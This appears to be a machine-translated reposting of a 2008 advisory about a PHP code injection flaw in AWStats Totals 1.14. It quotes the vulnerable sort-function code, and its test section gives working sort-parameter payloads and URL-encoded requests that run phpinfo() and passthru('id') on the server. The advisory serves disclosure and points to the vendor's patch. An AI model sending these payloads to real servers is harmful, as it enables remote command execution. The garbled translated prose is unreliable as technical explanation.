AWStats Totals the sort parameter long-distance order carries out the crack

Add date: 10/09/2008 Publishing date: 10/09/2008 Hits: 2

Issues the date: 2008-08-26
Renewal date: 2008-08-27

Is affected the system:
Telartis AWStats Totals 1.14
Not affected system:
Telartis AWStats Totals 1.15
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30856

AWStats Totals is uses in examining AWStats the diary analysis tool total the simple PHP script.

AWStats Totals has taken 3 URL parameter month, year and sort, then has not used these parameters after the validity check. The procedure uses the sort parameter to construct the anonymous PHP function through the create_function() function:

> function multisort (&$array, $key) {
> $cmp = create_function ('$a, $b',
> 'if ($a [“'. $key. '“] == $b [”'. $key. '“]) return 0; '.
> 'return ($a [“'. $key. '“] > $b [”'. $key. '“])? -1: 1; ');
> usort ($array, $cmp);
>}
>
> if ($sort == 'config') sort($rows); else multisort ($rows, $sort);

If matches the quotation mark and angle bracket carefully, may pour into the PHP expression to the function code. For example, if must move the phpinfo() function, may establish the following sort value:

“] .phpinfo().$a [”

Because will move many times the code which will pour into, therefore may after the single transfer will withdraw from the procedure:

“] .phpinfo().exit().$a [”

May also use the variable expansion in the new edition PHP string of character to pour into the PHP expression:

{$ {phpinfo()}} {$ {exit()}}

<* origin: Elliot Kendall (ekendall@brandeis.edu)

Link: http://marc.info/?l=bugtraq&m=121977666015052&w=2
http://secunia.com/advisories/31630/
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!

http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22
http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22
http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d
http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d

Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:

Telartis
--------
At present the manufacturer had already issued the promotion patch repairs this security problem, welcome to manufacturer main page downloading:

http://www.telartis.nl/xcms/awstats/

Prev:Vim the Shell figurative meaning order carries out the crack

Next:Kyocera Mita Scanner File Utility file transfer table of contents traversal crack

Comment:

Category: Home > System crack